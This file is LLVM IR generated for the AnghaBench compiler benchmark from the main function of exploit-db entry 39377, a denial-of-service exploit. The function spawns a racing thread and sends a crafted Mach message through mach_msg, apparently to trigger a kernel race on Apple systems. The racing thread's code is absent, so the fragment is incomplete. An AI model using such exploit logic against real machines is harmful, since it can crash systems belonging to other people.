; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_39377.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_39377.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_3__ = type { i32, i32, i32, i8*, i8*, i32 }

@go = common dso_local global i64 0, align 8
@MACH_MSG_TYPE_COPY_SEND = common dso_local global i32 0, align 4
@start = common dso_local global i32 0, align 4
@MACH_SEND_MSG = common dso_local global i32 0, align 4
@MACH_PORT_NULL = common dso_local global i32 0, align 4
@MACH_MSG_TIMEOUT_NONE = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i8*, align 8
  %5 = alloca %struct.TYPE_3__, align 8
  store i32 0, i32* %1, align 4
  store i32 0, i32* %3, align 4
  %6 = load i64, i64* @go, align 8
  %7 = inttoptr i64 %6 to i8*
  %8 = bitcast i32* %3 to i8*
  %9 = call i32 @pthread_create(i32* %2, i32* null, i8* %7, i8* %8)
  store i8* inttoptr (i64 2819 to i8*), i8** %4, align 8
  %10 = bitcast %struct.TYPE_3__* %5 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %10, i8 0, i64 40, i1 false)
  %11 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 0
  store i32 40, i32* %11, align 8
  %12 = load i8*, i8** %4, align 8
  %13 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 4
  store i8* %12, i8** %13, align 8
  %14 = load i8*, i8** %4, align 8
  %15 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 3
  store i8* %14, i8** %15, align 8
  %16 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %17 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %18 = call i32 @MACH_MSGH_BITS(i32 %16, i32 %17)
  %19 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 2
  store i32 %18, i32* %19, align 8
  %20 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 1
  store i32 70, i32* %20, align 4
  %21 = call i32 @usleep(i32 100000)
  store i32 1, i32* @start, align 4
  %22 = load i32, i32* @MACH_SEND_MSG, align 4
  %23 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %5, i32 0, i32 0
  %24 = load i32, i32* %23, align 8
  %25 = load i32, i32* @MACH_PORT_NULL, align 4
  %26 = load i32, i32* @MACH_MSG_TIMEOUT_NONE, align 4
  %27 = load i32, i32* @MACH_PORT_NULL, align 4
  %28 = call i32 @mach_msg(%struct.TYPE_3__* %5, i32 %22, i32 %24, i32 0, i32 %25, i32 %26, i32 %27)
  %29 = load i32, i32* %2, align 4
  %30 = call i32 @pthread_join(i32 %29, i32* null)
  ret i32 0
}

declare !callback !2 dso_local i32 @pthread_create(i32*, i32*, i8*, i8*) #1

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #2

declare dso_local i32 @MACH_MSGH_BITS(i32, i32) #1

declare dso_local i32 @usleep(i32) #1

declare dso_local i32 @mach_msg(%struct.TYPE_3__*, i32, i32, i32, i32, i32, i32) #1

declare dso_local i32 @pthread_join(i32, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{!3}
!3 = !{i64 2, i64 3, i1 false}
